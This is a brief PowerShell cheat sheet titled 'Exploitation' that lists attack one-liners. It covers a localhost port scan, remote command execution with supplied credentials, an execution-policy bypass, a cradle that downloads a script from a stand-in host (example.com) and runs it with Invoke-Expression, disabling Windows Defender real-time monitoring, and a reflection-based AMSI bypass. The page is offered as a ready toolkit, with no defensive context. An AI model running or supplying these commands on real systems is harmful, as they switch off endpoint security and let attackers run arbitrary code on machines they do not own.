Exploitation
1) Port Scanning
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }2) Remote Command Execution
Invoke-Command -ComputerName TargetPC -ScriptBlock { whoami } -Credential (Get-Credential)3) Bypass Execution policy
Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps14) Execute remote scripts
$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)5) Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true6) Bypass AMSI
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)Last updated